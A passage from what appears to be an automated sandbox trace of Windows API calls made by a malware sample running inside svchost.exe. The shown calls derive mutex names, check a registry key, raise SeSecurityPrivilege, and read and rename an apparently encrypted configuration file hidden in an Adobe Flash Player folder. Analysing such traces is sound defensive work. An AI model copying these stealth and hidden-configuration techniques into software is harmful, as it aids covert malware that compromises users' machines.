ReleaseMutex (hMutex=0x1cc) returned 1 [0123.034] CloseHandle (hObject=0x1cc) returned 1 [0123.034] SetLastError (dwErrCode=0x0) [0123.034] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x493e0) Thread: id = 23 os_tid = 0xd74 [0120.209] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="3B") returned 2 [0120.209] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="00") returned 2 [0120.209] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="00") returned 2 [0120.209] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="00") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="F5") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="DF") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="E9") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="C2") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="D1") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="1C") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="32") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="93") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="1F") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="7D") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="5B") returned 2 [0120.210] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="B4") returned 2 [0120.210] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="3B000000F5DFE9C2D11C32931F7D5BB4") returned 0x1bc [0120.211] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0xffffffff) returned 0x0 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="36") returned 2 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="00") returned 2 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="00") returned 2 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="00") returned 2 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="0D") returned 2 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="BD") returned 2 [0120.211] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="9E") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="D8") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="1B") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="72") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="1D") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="75") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="37") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="87") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="23") returned 2 [0120.212] wvnsprintfW (in: pszDest=0x745ee18, cchDest=6, pszFmt="%02X", arglist=0x745edf4 | out: pszDest="A6") returned 2 [0120.212] CreateEventW (lpEventAttributes=0x4ece89c, bManualReset=0, bInitialState=0, lpName="360000000DBD9ED81B721D75378723A6") returned 0x1c0 [0120.212] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x745eff4 | out: phkResult=0x745eff4*=0x1c4) returned 0x0 [0120.213] RegQueryValueExW (in: hKey=0x1c4, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x745f020, lpData=0x0, lpcbData=0x745f004*=0x0 | out: lpType=0x745f020*=0x0, lpData=0x0, lpcbData=0x745f004*=0x0) returned 0x2 [0120.213] RegCloseKey (hKey=0x1c4) returned 0x0 [0120.213] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0120.213] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x745eff8 | out: lpFileSize=0x745eff8*=0) returned 1 [0120.213] CloseHandle (hObject=0x1c4) returned 1 [0120.214] GetLastError () returned 0x0 [0120.214] GetLastError () returned 0x0 [0120.214] GetLocalTime (in: lpSystemTime=0x745f008 | out: lpSystemTime=0x745f008*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x271)) [0120.214] GetCurrentThreadId () returned 0xd74 [0120.214] GetCurrentProcessId () returned 0x2ec [0120.214] wvnsprintfW (in: pszDest=0x54034c8, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x745efac | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: ") returned 86 [0120.214] wvnsprintfW (in: pszDest=0x5403574, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x745f028 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0120.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54044d8, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0120.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5404570, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0007, PID=0x02EC, TID=0x0D74, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0120.215] GetSystemTime (in: lpSystemTime=0x745ebf8 | out: lpSystemTime=0x745ebf8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x271)) [0120.215] SystemTimeToFileTime (in: lpSystemTime=0x745ebf8, lpFileTime=0x745ebe8 | out: lpFileTime=0x745ebe8) returned 1 [0120.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.216] GetUserNameExW () returned 0x1 [0120.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413288, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="8A") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="00") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="00") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="00") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="B7") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="49") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="67") returned 2 [0120.217] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="98") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="F6") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="14") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="59") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="35") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="AA") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="3E") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="27") returned 2 [0120.218] wvnsprintfW (in: pszDest=0x745e9e0, cchDest=6, pszFmt="%02X", arglist=0x745e9bc | out: pszDest="60") returned 2 [0120.218] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0120.218] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0120.376] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.376] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.376] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.377] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.377] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.377] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.377] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.377] GetCurrentThread () returned 0xfffffffe [0120.377] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x745ec44 | out: TokenHandle=0x745ec44*=0x0) returned 0 [0120.377] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x745ec44 | out: TokenHandle=0x745ec44*=0x1e4) returned 1 [0120.377] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x745ec4c | out: lpLuid=0x745ec4c*(LowPart=0x8, HighPart=0)) returned 1 [0120.378] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x745ec48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.378] GetLastError () returned 0x0 [0120.378] CloseHandle (hObject=0x1e4) returned 1 [0120.379] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.379] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52140d0, lpbSaclPresent=0x745ec7c, pSacl=0x745ec70, lpbSaclDefaulted=0x745ec78 | out: lpbSaclPresent=0x745ec7c, pSacl=0x745ec70, lpbSaclDefaulted=0x745ec78) returned 1 [0120.379] SetNamedSecurityInfoW () returned 0x0 [0120.403] LocalFree (hMem=0x52140d0) returned 0x0 [0120.403] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.403] GetCurrentThread () returned 0xfffffffe [0120.403] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x745ec44 | out: TokenHandle=0x745ec44*=0x0) returned 0 [0120.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x745ec44 | out: TokenHandle=0x745ec44*=0x1e4) returned 1 [0120.403] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x745ec4c | out: lpLuid=0x745ec4c*(LowPart=0x8, HighPart=0)) returned 1 [0120.404] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x745ec48*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.405] GetLastError () returned 0x0 [0120.405] CloseHandle (hObject=0x1e4) returned 1 [0120.405] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.405] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x745ec7c, pSacl=0x745ec70, lpbSaclDefaulted=0x745ec78 | out: lpbSaclPresent=0x745ec7c, pSacl=0x745ec70, lpbSaclDefaulted=0x745ec78) returned 1 [0120.405] SetNamedSecurityInfoW () returned 0x0 [0120.406] LocalFree (hMem=0x52142e0) returned 0x0 [0120.406] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0120.406] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x745ec90 | out: lpFileSize=0x745ec90*=2709) returned 1 [0120.406] VirtualAlloc (lpAddress=0x0, dwSize=0xa95, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.406] ReadFile (in: hFile=0x1e4, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0xa95, lpNumberOfBytesRead=0x745ec9c, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x745ec9c*=0xa95, lpOverlapped=0x0) returned 1 [0120.411] CloseHandle (hObject=0x1e4) returned 1 [0120.411] wvnsprintfA (in: pszDest=0x5413a88, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366141") returned 10 [0120.412] wvnsprintfA (in: pszDest=0x5413ba8, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366141") returned 10 [0120.413] wvnsprintfA (in: pszDest=0x5413a88, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366142") returned 10 [0120.414] wvnsprintfA (in: pszDest=0x5413b08, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366142") returned 10 [0120.416] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366147") returned 10 [0120.417] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366147") returned 10 [0120.418] wvnsprintfA (in: pszDest=0x5413a48, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366202") returned 10 [0120.420] wvnsprintfA (in: pszDest=0x5413b08, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366202") returned 10 [0120.421] wvnsprintfA (in: pszDest=0x5413ba8, cchDest=21, pszFmt="%d", arglist=0x745ebe0 | out: pszDest="1476366202") returned 10 [0120.422] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0120.428] WriteFile (in: hFile=0x1e4, lpBuffer=0x5406be0*, nNumberOfBytesToWrite=0xb97, lpNumberOfBytesWritten=0x745ec94, lpOverlapped=0x0 | out: lpBuffer=0x5406be0*, lpNumberOfBytesWritten=0x745ec94, lpOverlapped=0x0) returned 1 [0120.430] CloseHandle (hObject=0x1e4) returned 1 [0120.466] ReleaseMutex (hMutex=0x1cc) returned 1 [0120.498] CloseHandle (hObject=0x1cc) returned 1 [0120.498] SetLastError (dwErrCode=0x0) [0120.498] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0120.498] PathRenameExtensionW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", pszExt=".tmp" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.tmp") returned 1 [0120.499] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.tmp") returned 0xffffffff [0120.499] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.499] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0120.499] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x745f058 | out: lpFileSize=0x745f058*=2967) returned 1 [0120.499] CloseHandle (hObject=0x1cc) returned 1 [0120.500] lstrcmpiW (lpString1="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe", lpString2="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.tmp") returned -1 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="8A") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="00") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="00") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="00") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="B7") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="49") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="67") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="98") returned 2 [0120.501] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="F6") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="14") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="59") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="35") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="AA") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="3E") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="27") returned 2 [0120.502] wvnsprintfW (in: pszDest=0x745edb8, cchDest=6, pszFmt="%02X", arglist=0x745ed94 | out: pszDest="60") returned 2 [0120.502] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0120.502] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0x4e20) returned 0x0 [0120.664] MoveFileExW (lpExistingFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), lpNewFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.tmp" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.tmp"), dwFlags=0xb) returned 1 [0120.680] ReleaseMutex (hMutex=0x1cc) returned 1 [0120.681] CloseHandle (hObject=0x1cc) returned 1 [0120.681] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x745efd4 | out: phkResult=0x745efd4*=0x1cc) returned 0x0 [0120.682] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x745f000, lpData=0x0, lpcbData=0x745efe4*=0x0 | out: lpType=0x745f000*=0x0, lpData=0x0, lpcbData=0x745efe4*=0x0) returned 0x2 [0120.682] RegCloseKey (hKey=0x1cc) returned 0x0 [0120.682] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0120.683] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x745efd8 | out: lpFileSize=0x745efd8*=0) returned 1 [0120.683] CloseHandle (hObject=0x1cc) returned 1 [0120.683] GetLastError () returned 0x0 [0120.683] GetLastError () returned 0x0 [0120.683] GetLocalTime (in: lpSystemTime=0x745efe8 | out: lpSystemTime=0x745efe8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x5e)) [0120.683] GetCurrentThreadId () returned 0xd74 